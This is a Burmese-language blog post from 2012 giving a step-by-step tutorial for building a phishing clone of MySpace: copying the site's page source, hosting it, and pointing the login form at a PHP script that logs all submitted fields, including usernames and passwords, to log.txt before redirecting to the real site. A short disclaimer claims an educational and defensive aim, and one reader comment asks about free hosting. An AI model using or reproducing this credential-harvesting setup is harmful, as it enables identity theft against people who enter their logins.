Monday, October 29, 2012

Webpage အတုဖန္တီးမယ္ ...

အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။
တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္
ရြယ္ခ်က္မရိွပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္တတ္ရန္အတြက္သာျဖစ္ပါသည္။
Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး
Web site အတုဆိုတာကိုနားမလည္ဘူး
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website
ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။

ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password
ေတြပါသြားၿပီေပါ့

ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting
တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log
fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္
websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ

Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္

header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php
ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို
notepad နဲ႕ဖြင့္ပါ။
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက
user name နဲ႕ passwordေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့
E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..
Posted by at
Labels:

1 comment:

  1. UnknownJune 12, 2013 at 2:40 AM

    အစ္ကို ကြ်န္ေတာ္ က web hosting အေၾကာင္း သိခ်င္တယ္ဗ်ာ ေရးေပးပါလား။ 000webhost ပဲျဖစ္ျဖစ္. ဘာပဲျဖစ္ျဖစ္ေပါ့။ ပိုက္ပိုက္မေပးရမွ ေနာ္။ ဟီးးးးးးး
    စိတ္ဝင္စားလို႔ပါဗ်ာ. တျခားသူေတြလည္း ဗဟုသုတရတာေပါ့ေနာ္။

    ReplyDelete

Subscribe to: Post Comments (Atom)